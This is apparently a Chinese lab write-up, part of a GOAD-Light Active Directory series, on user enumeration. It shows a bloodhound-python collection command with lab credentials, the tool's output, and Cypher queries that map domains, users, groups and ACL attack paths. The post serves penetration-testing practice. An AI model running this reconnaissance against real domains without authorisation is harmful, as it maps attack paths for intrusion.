INFO: Connecting to LDAP server: winterfell.north.sevenkingdoms.local                                                                                                                     
INFO: Found 1 domains                                                                                                                                                                     
INFO: Found 2 domains in the forest                                                                                                                                                       
INFO: Found 2 computers                                                                                                                                                                   
INFO: Connecting to GC LDAP server: winterfell.north.sevenkingdoms.local                                                                                                                  
INFO: Connecting to LDAP server: winterfell.north.sevenkingdoms.local                                                                                                                     
INFO: Found 17 users                                                                                                                                                                      
INFO: Found 51 groups                                                                                                                                                                     
INFO: Found 3 gpos                                                                                                                                                                        
INFO: Found 1 ous                                                                                                                                                                         
INFO: Found 19 containers                                                                                                                                                                 
INFO: Found 1 trusts                                                                                                                                                                      
INFO: Starting computer enumeration with 10 workers                                                                                                                                       
INFO: Querying computer: castelblack.north.sevenkingdoms.local                                                                                                                            
INFO: Querying computer: winterfell.north.sevenkingdoms.local                                                                                                                             
INFO: Done in 00M 01S                                                                                                                                                                     
INFO: Compressing output into 20260121041638_bloodhound.zip
1
bloodhound-python --zip -c All -d sevenkingdoms.local -u brandon.stark@north.sevenkingdoms.local -p iseedeadpeople -dc kingslanding.sevenkingdoms.local -ns 192.168.56.10
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)                                                                                                                        
INFO: Found AD domain: sevenkingdoms.local                                                                                                                                                
INFO: Getting TGT for user                                                                                                                                                                
INFO: Connecting to LDAP server: kingslanding.sevenkingdoms.local                                                                                                                         
INFO: Found 1 domains                                                                                                                                                                     
INFO: Found 2 domains in the forest                                                                                                                                                       
INFO: Found 1 computers                                                                                                                                                                   
INFO: Connecting to LDAP server: kingslanding.sevenkingdoms.local                                                                                                                         
INFO: Found 16 users                                                                                                                                                                      
INFO: Found 59 groups                                                                                                                                                                     
INFO: Found 2 gpos                                                                                                                                                                        
INFO: Found 9 ous                                                                                                                                                                         
INFO: Found 19 containers                                                                                                                                                                 
INFO: Found 1 trusts                                                                                                                                                                      
INFO: Starting computer enumeration with 10 workers                                                                                                                                       
INFO: Querying computer: kingslanding.sevenkingdoms.local                                                                                                                                 
INFO: Done in 00M 00S                                                                                                                                                                     
INFO: Compressing output into 20260121041749_bloodhound.zip

Bloodhound安装参考

https://www.cnblogs.com/yuy0ung/articles/18411240

显示所有的域和主机

1
MATCH p = (d:Domain)-[r:Contains*1..]->(n:Computer) RETURN p

image-20260121193915738

显示所有用户

1
MATCH p = (d:Domain)-[r:Contains*1..]->(n:User) RETURN p

image-20260121194323948

domain/group/user之间的映射

1
MATCH q=(d:Domain)-[r:Contains*1..]->(n:Group)<-[s:MemberOf]-(u:User) RETURN q

image-20260121194456191

用户ACL

1
MATCH p=(u:User)-[r1]->(n) WHERE r1.isacl=true and not tolower(u.name) contains 'vagrant' RETURN p

image-20260121194537096

靶场
GOAD-Light-Part3-用户枚举
http://xiaowu5.cn/2026/01/21/GOAD-Light-Part3-用户枚举/
作者
5
发布于
2026年1月21日
许可协议
BY XIAOWU